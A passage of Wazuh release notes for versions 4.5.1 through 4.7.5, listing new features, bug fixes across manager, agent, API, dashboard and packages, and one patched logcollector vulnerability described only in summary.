  • #2807 Silenced sudo package check.

  • #2821 Removed debug variable in Admin certificate generation.

  • #2822 Do not decompress .tar.xz file, remove xz dependency.

  • #2827 Added step for restore ossec.conf file in backup/restore scripts.

  • #2838 Removed download-content.sh and download.rules files.

Resolved issues

This release resolves known issues as the following:

Manager
  • #17886 Updated cluster connection cleanup to remove temporary files when the connection between a worker and a master is broken.

  • #23371 Added a mechanism to prevent cluster errors from an expected wazuh-db exception.

  • #23216 Fixed a race condition when creating agent database files from a template.

Agent
  • #16839 Fixed process path retrieval in Syscollector on Windows XP.

  • #16056 Fixed the OS version detection on Alpine Linux.

  • #18642 Fixed Solaris 10 name not showing in the dashboard.

  • #21932 Fixed an error in macOS Ventura compilation from sources.

  • #23532 Fixed PyPI package gathering on macOS Sonoma.

RESTful API
  • #20527 Fixed a warning from SQLAlchemy involving detached Roles instances in RBAC.

  • #23120 Fixed an issue in GET /manager/configuration where only the last of multiple <ignore> items in the configuration file was displayed.

Dashboard plugin
  • #5840 Fixed a problem with the agent menu header when the side menu is docked.

  • #6102 Fixed how the query filters apply on the Security Alerts table.

  • #6177 Fixed exception in agent view when an agent doesn't have policies.

  • #6177 Fixed exception in Inventory when agents don't have operating system information.

  • #6177 Fixed pinned agent state in URL.

  • #6234 Fixed invalid date format in About and Agents views.

  • #6305 Fixed issue with script to install agents on macOS if using the registration password deployment variable.

  • #6327 Fixed an issue preventing the use of a hostname as the Server address in Deploy New Agent.

  • #6342 Fixed wrong Queue Usage values in Server management > Statistics.

  • #6352 Fixed Statistics view errors when cluster mode is disabled.

  • #6374 Fixed the help menu, to be consistent and avoid duplication.

  • #6378 Fixed the axis label visual bug from dashboards.

  • #6431 Fixed error displaying when clicking Refresh in MITRE ATT&CK if the the Wazuh indexer service is down.

  • #6484 Fixed minor style issues. #6489 #6587

  • #6617 Fixed error when clicking Log collection in Configuration of a disconnected agent.

  • #6333 Fixed a typo in an abbreviation for Fully Qualified Domain Name.

  • #6553 Fixed "View alerts of this Rule" link.

Packages
  • #2381 Fixed DNS validation in the installation assistant.

  • #2401 Fixed debug redirection in the installation assistant.

  • #2850 Fixed certificates generation output for certificates not created.

  • #2906 Moved up the hardware check of the installation assistant. Now dependencies don't get installed if it fails.

  • #2380 Fixed source_branch variable in master branch.

  • #2535 Fixed mkdir wazuh-install-files error.

  • #2560 Fixed internalusers-backup directory owner and permissions.

  • #2585 Fixed bug with -i option.

  • #2646 Fixed wazuh-indexer.spec duplicated information.

  • #2723 Fixed Filebeat template URL in Wazuh indexer.

  • #2796 Fixed duplicated help menu.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.7.5 Release notes - 30 May 2024

This section lists the changes in version 4.7.5. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #23441 Added a database endpoint to recalculate the hash of agent groups.

Wazuh dashboard
  • #6687 Added sanitization to custom branding SVG files.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#23447

Fixed an issue in a cluster task where full group synchronization was constantly triggered.

#23216

Fixed race condition when creating agent database files from a template.

Wazuh agent

Reference

Description

#23468

Fixed segmentation fault in the logcollector multiline-regex configuration.

#23543

Fixed crash in FIM module when processing paths with non UTF-8 characters.

Wazuh dashboard

Reference

Description

#6718

Fixed a missing space in the macOS agent installation command when a password is required.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.4 Release notes - 29 April 2024

This section lists the changes in version 4.7.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#22933

Fixed wazuh-db not clearing labels from deleted agents.

#22994

Improved stability by ensuring workers resume normal operations even during master node downtime.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.3 Release notes - 4 March 2024

This section lists the changes in version 4.7.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#21997

Resolved a transitive mutex locking issue in wazuh-db that was impacting performance.

#21977

Wazuh DB internal SQL queries have been optimized by tuning database indexes to improve performance.

Wazuh dashboard

Reference

Description

#6458

Fixed an error when uploading CDB lists.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.2 Release notes - 10 January 2024

This section lists the changes in version 4.7.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #21142 Added minimum time constraint of 1 hour for downloading the Vulnerability Detector feed.

Wazuh agent
  • #20638 Added request timeouts for the external and cloud integrations. This prevents indefinite waiting for a response.

Ruleset
  • #17565 Added new SCA policy for Debian 12 systems.

Other
  • #20798 Upgraded external aiohttp library dependency to version 3.9.1 to address a security vulnerability.

Wazuh dashboard
  • #6191 Added Hostname and Board Serial information to Agents > Inventory data.

  • #6208 Added contextual information to the deploy agent steps.

Packages
  • #2670 Removed installed dependencies that were part of the Wazuh installation assistant. This ensures a clean post-installation state.

  • #2677 Removed gnupg package as RPM dependency in the Wazuh installation assistant.

  • #2693 Added Debian12 SCA files.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#21011

wazuh-remoted now logs the warning regarding invalid message size from agents in hex format.

#20658

Fixed a bug within the Windows Eventchannel decoder to ensure proper handling of Unicode characters.

#20735

Fixed data validation for decoding Windows Eventchannel XML input strings.

Wazuh agent

Reference

Description

#20656

Implemented validation for the format of the IP address parameter in the host_deny active response.

#20594

Fixed a bug in the Windows agent that might lead it to crash when gathering forwarded Windows events.

#20447

Fixed issue with the profile prefix in parsing AWS configuration profiles.

#20660

Fixed parsing and validation for the AWS regions argument, expanding the AWS regions list accordingly.

Ruleset

Reference

Description

#20663

Updated AWS Macie rules to show relevant fields in alert details.

Wazuh dashboard

Reference

Description

#6185

Fixed Agents preview page load when there are no registered agents.

#6206, #6213

Changed the endpoint to get Wazuh server auth configuration to manager/configuration/auth/auth.

#6224

Fixed error navigating back to agent in some scenarios.

Packages

Reference

Description

#2667

Fixed warning message when generating certificates.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.1 Release notes - 20 December 2023

This section lists the changes in version 4.7.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements as the following:

Agent
  • #20616 Improved WPK upgrade scripts to ensure safe execution and backup generation.

Other
  • #20149 Upgraded external certifi library dependency version to 2023.07.22.

  • #20149 Upgraded external requests library dependency version to 2.31.0.

  • #18800 Upgraded embedded Python version to 3.9.18.

Packages
  • #2559 Updated Wazuh assistant help text for offline download option.

  • #2627 Updated error message for CentOS GPG key import failure.

  • #2624 Added macOS 14 Sonoma SCA files.

Resolved issues

This release resolves known issues as the following:

Manager

Reference

Description

#20178

Fixed a thread lock bug that slowed down wazuh-db performance.

#20386

Fixed a bug in Vulnerability detector that skipped vulnerabilities for Windows 11 21H2.

#5941

The installer now updates the merged.mg file permissions on upgrade.

#19993

Fixed an insecure request warning in the Shuffle integration.

#19888

Fixed a bug that corrupted cluster logs when rotated.

#20580

Fixed a bug causing the Canonical feed parser to fail in Vulnerability Detector.

Agent

Reference

Description

#20332

Fixed a bug that prevented the local IP address from appearing in the port inventory from macOS agents.

#20180

Fixed the default Logcollector settings on macOS to collect logs out-of-the-box.

#20169

Fixed a bug in the FIM decoder at wazuh-analysisd that ignored Windows Registry events from agents earlier than 4.6.0.

#20250

Fixed multiple bugs in the Syscollector decoder at wazuh-analysisd that did not sanitize the input data properly.

#20284

Added the pyarrow_hotfix dependency to fix the pyarrow CVE-2023-47248 vulnerability in the AWS integration.

#20598

Fixed a bug that allowed two simultaneous updates to occur through WPK.

RESTful API

Reference

Description

#18423

Fixed inconsistencies in the behavior of the q parameter of some endpoints.

#18495

Fixed a bug in the q parameter of the GET /groups/{group_id}/agents endpoint.

#19533

Fixed bug in the regular expression used to reject non ASCII characters in some endpoints.

Wazuh dashboard

Reference

Description

#6076

Fixed problem when using non latin characters in the username.

#6104

Fixed UI crash on retrieving log collection configuration for macos agent.

#6105

Fixed incorrect validation of the agent name on the Deploy new agent window.

#6184

Fixed missing columns in the agent table of Groups.

Packages

Reference

Description

#2561

Fixed network.host fetching in Password tool. A commented line like #network.host: "XXX.XXX.XXX.XXX" is now ignored.

#2493

Fixed issue where Intel64 macos packages failed to install on ARM-based machines.

#2611

Fixed file permissions issue in merged.mg files when updating a manager using packages update.

Changelogs

More details about these changes are provided in the changelog of each component:

4.7.0 Release notes - 27 November 2023

This section lists the changes in version 4.7.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #18026 Added native Maltiverse integration. Wazuh now leverages the Maltiverse API to enrich alerts. This enhancement supplements alert details with threat intelligence data following the Elastic Common Schema (ECS) standard. Acknowledgments to David Gil (@dgilm).

  • #16090 Added an option to customize the Slack integration.

  • #16008 An unnecessary sanity check related to Syscollector has been removed from wazuh-db.

  • #18570 Added support for Amazon Linux 2023 in Vulnerability Detector.

  • #20367 The manager now rejects agents with a higher version by default.

Agent
  • #17951 Added support for Custom AWS Logs in Buckets via AWS SQS. This enhancement improves visibility and troubleshooting in AWS environments.

  • #15582 Added geolocation for aws.data.client_ip field. The new GeoIP feature enables tracking of geographical locations of AWS ALB client IP addresses. This addition enhances visibility into network traffic and security monitoring. Acknowledgements to Arran Rhodes @rh0dy.

  • #15699 Added package inventory support for Alpine Linux in Syscollector.

  • #16117 Added package inventory support for MacPorts package manager in Syscollector. This enhancement improves compatibility with macOS.

  • #17982 Added package inventory support for Python PYPI and Node.js in Syscollector.

  • #15000 Added process information to the open ports inventory in Syscollector. This addition enhances ports inventory capabilities for better management and tracking on Linux systems.

  • #17966 The shared modules code has been sanitized according to the convention.

  • #18006 The package inventory internal messages have been modified to honor the schema compliance.

  • #20360 Added clarification to the agent connection log. The agent must connect to a manager of the same or higher version.

Wazuh dashboard
  • #5680 Added the Status detail column in the Agents table.

  • #5738 The agent registration wizard now effectively manages special characters in passwords.

  • #5636 Changed the Network ports table columns for Linux agents.

  • #5707 Changed Timelion-type displays in the Management > Statistics section to line-type displays.

  • #5747 Removed views in JSON and XML formats from the Management settings.

RESTful API
  • #19726 Added new status_code field to GET /agents response.

  • #20126 Deprecated the following API endpoints.

    • PUT /vulnerability

    • GET /vulnerability/{agent_id}

    • GET /vulnerability/{agent_id}/last_scan

    • GET /vulnerability/{agent_id}/summary/{field}

Packages
  • #2568 Updated links to wazuh-dashboard-plugins repository.

  • #2555 Added firewall validation to the installation assistant.

Resolved issues

This release resolves known issues as the following:

Manager

Reference

Description

#16683

Fixed an unexpected cluster error when a worker gets restarted.

#16681

Fixed an issue that let the manager validate wrong XML configurations.

#19869

Fixed default value for multiarch field in syscollector packages.

#20081

Fixed WPK rollback rebooting the host in Windows agent.

Agent

Reference

Description

#17006

Fixed detection of osquery 5.4.0+ running outside the integration.

#16089

Fixed vendor data in package inventory for Brew packages on macOS.

#19811

Improved reliability of the signature verification mechanism.

RESTful API

Reference

Description

#16489

Addressed error handling for non-utf-8 encoded file readings.

#16914

Resolved an issue in the WazuhException class that disrupted the API executor subprocess.

#16918

Corrected an empty value problem in the API specification key.

Other

Reference

Description

#17040

Fixed the signature of the internal function OSHash_GetIndex().

Wazuh dashboard

Reference

Description

#5591

Fixed problem with new or missing columns in the Agents table.

#5676

Fixed the color of the agent name in the groups section in dark mode.

#5597

Fixed the propagation event so that the flyout data, in the decoders, does not change when the button is pressed.

#5631

Fixed the tooltips of the tables in the Security section, and removed unnecessary requests.

Packages

Reference

Description

#2523

Fixed wrong condition when generating the RPM Wazuh indexer package with an existent base file.

Changelogs

More details about these changes are provided in the changelog of each component:

4.6.0 Release notes - 31 October 2023

This section lists the changes in version 4.6.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights
  • Included support for the Microsoft Graph Security API. This addition enables users to integrate and fetch security alerts from multiple Microsoft products. It provides a cohesive security perspective.

  • Added the Webhook input API endpoint. It paves the way to dynamic integrations and real-time responses. It enhances automation capabilities and responsiveness.

  • Incorporated Office 365 support for GCC/GCCH. This addition extends monitoring coverage for organizations with a strong reliance on Office 365, particularly in GCC/GCCH environments. It ensures comprehensive compliance and security.

  • Support for AlmaLinux OS, Debian 12, and Amazon Linux 2022 is now included in Vulnerability Detector. Expanding support to newer OS versions demonstrates the platform adaptability to the evolving Linux ecosystem. It also highlights our commitment to user safety across diverse environments.

  • Included PCRE2 support in Security Configuration Assessment (SCA). This addition provides users with a more powerful pattern-matching tool. It enhances the software auditing and compliance capabilities

Breaking changes
  • The integration methods for Splunk, OpenSearch, and Elastic Stack have been changed. Please refer to the Integrations guide to learn more.

What's new

This release includes new features or enhancements as the following:

Wazuh manager
  • #13559 wazuh-authd can now generate X509 certificates.

  • #13797 Introduced a new CLI to manage features related to the Wazuh API RBAC resources.

  • #13034 Added support for Amazon Linux 2022 in Vulnerability Detector.

  • #16343 Added support for Alma Linux in Vulnerability Detector.

  • #18542 Added support for Debian 12 in Vulnerability Detector.

  • #14953 Added mechanism in wazuh-db to identify fragmentation and perform vacuum.

  • #19956 Adjusted the default settings for wazuh-db to perform database auto-vacuum more often.

  • #18333 Added an option to set whether the manager should ban newer agents.

  • #15661 Added mechanism to prevent Wazuh agents connections to lower manager versions.

  • #14659 wazuh-remoted now checks the size of the files to avoid malformed merged.mg.

  • #14024 Added a limit option for the Rsync dispatch queue size.

  • #14026 Added a limit option for the Rsync thread pool.

  • #14549 wazuh-authd now shows a warning when deprecated forcing options are present in the configuration.

  • #14804 The agent now notifies the manager when Active Response fails to run netsh.

  • #13906 Use a new broadcast system to send agent group information from the master node of a cluster.

  • #15220 Changed cluster send_request method so that timeouts are treated as exceptions and not as responses.

  • #13065 Refactored methods responsible for file synchronization within the cluster.

  • #16065 Changed schema constraints for sys_hwinfo table.

  • #15709 The Auth process does not start when the registration password is empty.

  • #19400 Changed the message type for GetSecurityInfo from error to debug.

Agent
  • #15226 Added GuardDuty Native support to the AWS integration.

  • #14768 Added --prefix parameter to Azure Storage integration.

  • #16493 Added validations for empty and invalid values in AWS integration.

  • #13573 Added new unit tests for GCloud integration and increased coverage to 99%.

  • #14104 Added new unit tests for Azure Storage integration and increased coverage to 99%.

  • #14177 Added new unit tests for Docker Listener integration.

  • #18116 Added support for Microsoft Graph security API. Thanks to Bryce Shurts (@S-Bryce).

  • #15852 Added wildcard support in FIM Windows registers.

  • #15973 Added wildcards support for folders in the localfile configuration on Windows.

  • #14782 Added new settings ignore and restrict to logcollector.

  • #12745 Added RSync and DBSync to FIM.

  • #17124 Added PCRE2 regex for SCA policies.

  • #14763 Added mechanism to detect policy changes.

  • #13264 FIM option fim_check_ignore now applies to files and directories.

  • #16531 Changed AWS integration to take into account the user configuration found in the .aws/config file.

  • #14537 Changed the calculation of timestamps in AWS and Azure modules by using UTC timezone.

  • #15009 Changed the AWS integration to only show the Skipping file with another prefix message in debug mode.

  • #14999 Changed debug level required to display CloudWatch Logs event messages.

  • #17447 Changed syscollector database default permissions.

  • #17161 Changed agent IP lookup algorithm.

  • #14499 Changed InstallDate origin in Windows installed programs.

  • #14524 Enhanced clarity of certain error messages in the AWS integration for better exception tracing.

  • #13420 Improved external integrations SQLite queries.

  • #16325 Improved items iteration for Config and VPCFlow AWS integrations.

  • #14784 Unit tests have been added to the shared JSON handling library.

  • #14476 Unit tests have been added to the shared SQLite handling library.

  • #15032 Improved command to change user and group from version 4.2.x to 4.x.x.

  • #15647 Changed the internal value of the open_attemps configuration.

  • #13878 The unused option local_ip for agent configuration has been deleted.

  • #14684 Removed unused migration functionality from the AWS integration.

  • #17655 Deleted definitions of repeated classes in the AWS integration.

  • #15031 Removed duplicate methods in AWSBucket and reuse inherited ones from WazuhIntegration.

  • #16547 Added support for Office365 MS/Azure Government Community Cloud (GCC) and Government Community Cloud High (GCCH) API. Thanks to Bryce Shurts (@S-Bryce).

  • #19758 Reduced the default FIM event throughput to 50 EPS.

RESTful API
  • #17670 Added POST /events API endpoint to ingest logs through the API.

  • #17865 Added query, select and distinct parameters to multiple endpoints.

  • #13919 Added a new upgrade and migration mechanism for the RBAC database.

  • #13654 Added a new API configuration option to rotate log files based on a given size.

  • #15994 Added relative_dirname parameter to GET, PUT and DELETE methods of the /decoder/files/{filename} and /rule/files/{filename} endpoints.

  • #18212 Added a new configuration option to disable uploading configurations containing the new allow_higher_version setting.

  • #13615 Added API integration tests documentation.

  • #13646 Changed the API's response status code for Wazuh cluster errors from 400 to 500.

  • #15934 Removed legacy code related to agent databases in /var/agents/db.

  • #19001 Changed Operational API error messages to include additional information.

Ruleset
  • #14138 The SSHD decoder has been improved to catch disconnection events.

Wazuh dashboard
  • #5197 #5274 #5298 #5409 Added rel="noopener noreferrer" in documentation links.

  • #5203 Added ignore and restrict options to Syslog configuration.

  • #5376 Added the extensions.github and extensions.office settings to the default configuration file.

  • #4163 Added new global error treatment (client-side).

  • #5519 Added new CLI to generate API data from specification file.

  • #5551 Added specific RBAC permissions to the Security section.

  • #5443 Added Refresh and Export formatted button to panels in Agents > Inventory data.

  • #5491 Added Refresh and Export formatted buttons to Management > Cluster > Nodes.

  • #5201 Changed of regular expression in RBAC.

  • #5384 Migrated the timeFilter, metaFields, and maxBuckets health checks inside the pattern check.

  • #5485 Changed the query to search for an agent in Management > Configuration.

  • #5476 Changed the search bar in management/log to the one used in the rest of the app.

  • #5457 Changed the design of the wizard to add agents.

  • #5363 #5442 #5443 #5444 #5445 #5447 #5452 #5491 #5785 Introduced a new, enhanced search bar. It adds new features to all the searchable tables which leverages the Wazuh API. It also addresses some of the issues found in the previous version.

  • #5451 Removed deprecated request and code in agent's view.

  • #5453 Removed unnecessary dashboard queries caused by the deploy agent view.

  • #5500 Removed repeated and unnecessary requests in the Security section.

  • #5519 Removed scripts to generate API data from live Wazuh manager.

  • #5532 Removed the pretty parameter from cron job requests.

  • #5528 Removed unnecessary requests in the Management > Status section.

  • #5485 Removed obsolete code that caused duplicate requests to the API in Management.

  • #5592 Removed unused embedded jquery-ui.

Resolved issues

This release resolves known issues as the following:

Wazuh manager

Reference

Description

#13979

Fixed wazuh-remoted not updating total bytes sent in UDP.

#14356

Fixed translation of packages with a missing version in CPE Helper for Vulnerability Detector.

#14174

Fixed undefined behavior issues in Vulnerability Detector unit tests.

#14019

Fixed permission error when producing FIM alerts.

#15164

Fixed memory leaks in wazuh-authd.

#14763

Fixed Audit policy change detection in FIM for Windows.

#14408

Fixed origin_module variable value when sending API or framework messages to core sockets.

#15715

Fixed an issue where an erroneous tag appeared in the cluster logs.

#15250

Fixed log error displayed when there's a duplicate worker node name within a cluster.

#15487

Resolved an issue in the agent_upgrade CLI when used from worker nodes.

#18047

Fixed error in the agent_upgrade CLI when displaying upgrade result.

#15277

Fixed error in which the connection with the cluster was broken in local clients for not sending keepalives messages.

#15298

Fixed error in which exceptions were not correctly handled when dapi_err command could not be sent to peers.

#16257

Fixed error in worker's Integrity sync task when a group folder was deleted in master.

#16506

Fixed error when trying to update an agent through the API or the CLI while pointing to a WPK file.

#15074

Fixed wazuh-remoted high CPU usage in a master node without agents.

#16101

Fixed race condition in wazuh-analysisd handling the rule ignore option.

#16000

Fixed missing rules and decoders in Analysisd JSON report.

#14356

Fixed translation of packages with missing version in CPE Helper.

#15826

Fixed log date parsing at predecoding stage.

#14019

Fixed permission error in JSON alert.

Agent

Reference

Description

#13534

Fixed the architecture of the dependency URL for macOS.

#13588

Fixed a path length limitation that prevented FIM from reporting changes on Windows.

#14993

Updated the AWS integration to use the regions specified in the AWS config file when no regions are provided in ossec.conf.

#14850

Corrected the error code #2 for the SIGINT signal within the AWS integration.

#14740

Fixed the discard_regex functionality for the AWS GuardDuty integration.

#14500

Fixed error messages in the AWS integration when there is a ClientError.

#14493

Fixed error that could lead to duplicate logs when using the same dates in the AWS integration.

#16116

Fixed check_bucket method in AWS integration to be able to find logs without a folder in root.

#16360

Added field validation for last_date.json in Azure Storage integration.

#15763

Improved handling of invalid regions given to the VPCFlow AWS integration, enhancing exception clarity.

#16070

Fixed error in the GCloud Subscriber unit tests.

#16410

Fixed the marker that AWS custom integrations use.

#16365

Fixed error messages when there are no logs to process in the WAF and Server Access AWS integrations.

#16463

Added region validation before instantiating AWS service class in the AWS integration.

#14161

Fixed InstallDate format in Windows installed programs.

#15428

Fixed syscollector default interval time when the configuration is empty.

#16268

Fixed agent starts with an invalid FIM configuration.

#15719

Fixed rootcheck scan trying to read deleted files.

#15739

Fixed compilation and build in Gentoo.

#19375

Fixed a crash when FIM scanned long Windows paths.

#19378

Fixed FIM who-data support for AArch64 platforms.

RESTful API

Reference

Description

#13421

Fixed an unexpected behavior when using the q and select parameters in some endpoints.

#15203

Resolved an issue in the GET /manager/configuration API endpoint when retrieving the vulnerability detector configuration section.

#15152

Fixed GET /agents/upgrade_result endpoint internal error with code 1814 in large environments.

#16756

Enhanced the alphanumeric_symbols regex to better accommodate specific SCA remediation fields.

#15967

Fixed bug that would not allow retrieving the Wazuh logs if only the JSON format was configured.

#16310

Fixed error in GET /rules when variables are used inside id or level ruleset fields.

#16248

Fixed PUT /syscheck and PUT /rootcheck endpoints to exclude exception codes properly.

#16347

Adjusted test_agent_PUT_endpoints.tavern.yaml to resolve a race condition error.

#16844

Fixed some errors in API integration tests for RBAC white agents.

Wazuh dashboard

Reference

Description

#4828

Fixed trailing hyphen character for OS value in the list of agents.

#4911

Fixed several typos in the code.

#4917

Fixed the display of more than one protocol in the Global configuration section.

#4918

Fixed uncaught error and wrong error message in the PCI DSS Control tab.

#4894

Fixed references to Elasticsearch in Wazuh-stack plugin.

#5135

Fixed the 2 errors that appeared in console in Settings > Configuration section.

#5376

Fixed the GitHub and Office 365 module visibility configuration for each API host that was not kept when changing/upgrading the plugin.

#5376

Fixed the GitHub and Office 365 modules appearing in the main menu when they were not configured.

#5364

Fixed TypeError in FIM Inventory using a new error handler.

#5423

Fixed error when using invalid group configuration.

#5460

Fixed repeated requests in inventory data and configurations of an agent.

#5465

Fixed repeated requests in the group table when adding a group or refreshing the table.

#5521

Fixed an error in the request body suggestions of API Console.

#5734

Fixed some errors related to relative dirname of rule and decoder files.

#5879

Fixed package URLs in the aarch64 commands.

#5888

Fixed the install macOS agent commands.

Packages

Reference

Description

#2495

Fixed debug redirection in packages installation in the Wazuh installation assistant.

#2490

Fixed dashboard dependencies in RHEL systems.

#2498

Replaced requestHeadersWhitelist with requestHeadersAllowlist.

#2486

Fixed common WPK container.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.4 Release notes - 23 October 2023

This section lists the changes in version 4.5.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #19729 Added a timeout on requests between components through the cluster.

Resolved issues

This release resolves known issues as the following:

Manager

Reference

Description

#19702

Fixed a bug that might leave some worker's services hanging if the connection to the master was broken.

#19706

Fixed vulnerability scan on Windows agent when the OS version has no release data.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.3 Release notes - 10 October 2023

This section lists the changes in version 4.5.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #18783 Vulnerability Detector now fetches the SUSE feeds in Gzip compressed format.

Agent
  • #19205 Support for macOS 14 (Sonoma).

RESTful API
  • #18509 Added support for the $ symbol in query values.

  • #18346 Added support for the @ symbol in query values.

  • #18493 Added support for nested queries in the q API parameter.

  • #18432 Updated force flag message in the agent_upgrade CLI.

Security updates

This release fixes the following vulnerabilities:

Agent

CVE

Reference

Description

CVE-2023-42463

#19069

Fixed a stack overflow hazard in wazuh-logcollector that could allow a local privilege escalation. Found by Keith Yeo (@kyeojy).

Resolved issues

This release resolves known issues as the following:

Manager

Reference

Description

#18737

Fixed a bug that might cause wazuh-analysisd to crash if it receives a status API query during startup.

#18976

Fixed a bug that might cause wazuh-maild to crash when handling large alerts.

#19217

Addressed an issue in Vulnerability Detector when fetching the Suse Linux Enterprise 15 feeds.

Agent

Reference

Description

#18773

Fixed a bug in the memory handle at the agent's data provider helper.

#18903

Fixed a data mismatch in the OS name between the global and agents' databases.

#19286

Fixed wrong Windows agent binaries metadata.

#19397

Fixed error during the Windows agent upgrade.

RESTful API

Reference

Description

#18362

Removed undesired characters when listing rule group names in GET /rules/groups.

#18434

Fixed an error when using the query condition=all in GET /sca/{agent_id}/checks/{policy_id}.

#18733

Fixed an error in the API log mechanism where sometimes the requests would not be printed in the log file.

Wazuh dashboard

Reference

Description

#5925

Fixed the command for agent installation on SUSE to use zypper.

Wazuh Kibana plugin for Kibana 7.10.2

Reference

Description

#5925

Fixed the command for agent installation on SUSE to use zypper.

Wazuh Kibana plugin for Kibana 7.16.x and 7.17.x

Reference

Description

#5925

Fixed the command for agent installation on SUSE to use zypper.

Packages

Reference

Description

#2397

Changed GRUB options in build OVA process.

#2453

Fixed an issue with the Wazuh dashboard port check despite the -p|--port installation assistant option being specified.

#2461

Fixed an issue when passwords changed. Now the internal_users.yml file gets updated.

#2492

Fixed missing removal of Wazuh indexer remaining files upon rollback.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.2 Release notes - 6 September 2023

This section lists the changes in version 4.5.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #18085 wazuh-remoted now allows connection overtaking if the older agent doesn't respond for a while.

  • #18468 wazuh-remoted now prints the connection family when an unknown client gets connected.

  • #18437 The manager stops restricting the possible package formats in the inventory, to increase compatibility.

  • #18545 The manager stops blocking updates by WPK to macOS agents on ARM64, allowing custom updates.

  • #18770 Vulnerability Detector now fetches the Debian feeds in BZ2 compressed format.

Packages
  • #2337 Provided port number option to wazuh-install.sh script.

Resolved issues

This release resolves known issues as the following:

Manager

Reference

Description

#18472

Fixed a bug in wazuh-csyslogd that causes it to consume 100% of CPU while expecting new alerts.

Wazuh dashboard

Reference

Description

#5764

Fixed an error with the commands in Deploy new agent for Oracle Linux 6+ agents.

#5796

Fixed broken documentation links in Management > Configuration.

Wazuh Kibana plugin for Kibana 7.10.2, 7.16.x, and 7.17.x

Reference

Description

#5764

Fixed an error with the commands in Deploy new agent for Oracle Linux 6+ agents.

#5796

Fixed broken documentation links in Management > Configuration.

Changelogs

More details about these changes are provided in the changelog of each component:

4.5.1 Release notes - 24 August 2023

This section lists the changes in version 4.5.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights
  • Native support for Mac computers with Apple silicon. This release provides an ARM-ready Wazuh agent for macOS package.

Breaking changes

This release includes some breaking changes, such as the following:

Agent
  • #17748 Added the discard_regex functionality to Inspector and CloudWatchLogs AWS integrations.

    • With this change, execution stops without warning if you don't use the field parameter when mandatory.

What's new

This version includes new features or improvements, such as the following:

Manager
  • #18142 Vulnerability Detector now fetches the RHEL 5 feed URL from https://feed.wazuh.com by default.

  • #16846 The Vulnerability Detector CPE helper has been updated.

Agent
  • #2224 Added native agent support for Apple silicon.

  • #17673 Added new validations for the AWS integration arguments.

  • #16607 The agent for Windows now loads its shared libraries after running the verification.

Ruleset
  • #17794 The SCA policy for Ubuntu Linux 20.04 (CIS v2.0.0) has been remade.

  • #17812 Removed check 1.1.5 from Windows 10 SCA policy.

Other
  • #16990 The CURL library has been updated to v7.88.1.

Wazuh dashboard
  • #5478 Added Apple Silicon architecture button to the register Agent wizard.

  • #5497 Removed the agent name in the agent info ribbon.

  • #5539 Changed method to perform redirection on agent table buttons.

  • #5538 Changed Windows agent service name in the deploy agent wizard.

  • #5687 Changed the requests to get the agent labels from the managers.

Wazuh Kibana plugin for Kibana 7.10.2, 7.16.x, and 7.17.x
  • #5478 Added Apple Silicon architecture button to the register Agent wizard.

  • #5497 Removed the agent name in the agent info ribbon.

  • #5539 Changed method to perform redirection on agent table buttons.

  • #5538 Changed Windows agent service name in the deploy agent wizard.

  • #5687 Changed the requests to get the agent labels from the managers.

Resolved issues

This release resolves known issues as the following:

Manager

Reference

Description

#17866

Fixed a race condition in some RBAC unit tests by clearing the SQLAlchemy mappers.

#17490

Fixed a bug in wazuh-analysisd that could exceed the maximum number of fields when loading a rule.

#17126

Fixed a race condition in wazuh-analysisd FTS list.

#17143

Fixed a crash in Analysisd when parsing an invalid decoder.

#17701

Fixed a segmentation fault in wazuh-modulesd due to duplicate Vulnerability Detector configuration.

#16978

Fixed Vulnerability Detector configuration for unsupported SUSE systems.

Agent

Reference

Description

#17524

Fixed InvalidRange error in Azure Storage integration when trying to get data from an empty blob.

#17586

Fixed a memory corruption hazard in the FIM Windows Registry scan.

#17179

Fixed an error in Syscollector reading the CPU frequency on Apple M1.

#16659

Fixed agent WPK upgrade for Windows that might leave the previous version in the Registry.

#17176

Fixed agent WPK upgrade for Windows to get the correct path of the Windows folder.

RESTful API

Reference

Description

#17632

Fixed PUT /agents/upgrade_custom endpoint to validate that the file extension is .wpk.

#17660

Fixed errors in API endpoints to get labels and reports active configuration from managers.

Ruleset

Reference

Description

#17941

Fixed CredSSP encryption enforcement at Windows Benchmarks for SCA.

#17940

Fixed an inverse logic in MS Windows Server 2022 Benchmark for SCA.

#17779

Fixed a false positive in Windows Eventchannel rule due to substring false positive.

#17813

Fixed missing whitespaces in SCA policies for Windows.

#17798

Fixed the description of a Fortigate rule.

Wazuh dashboard

Reference

Description

#5471

Fixed the rendering of tables that contain IPs and agent overview.

#5490

Fixed the agents active coverage stat as NaN in Details panel of Agents section.

#5687

Fixed a broken documentation link to agent labels.

#5714

Fixed the PDF report filters applied to tables.

#5766

Fixed outdated year in the PDF report footer.

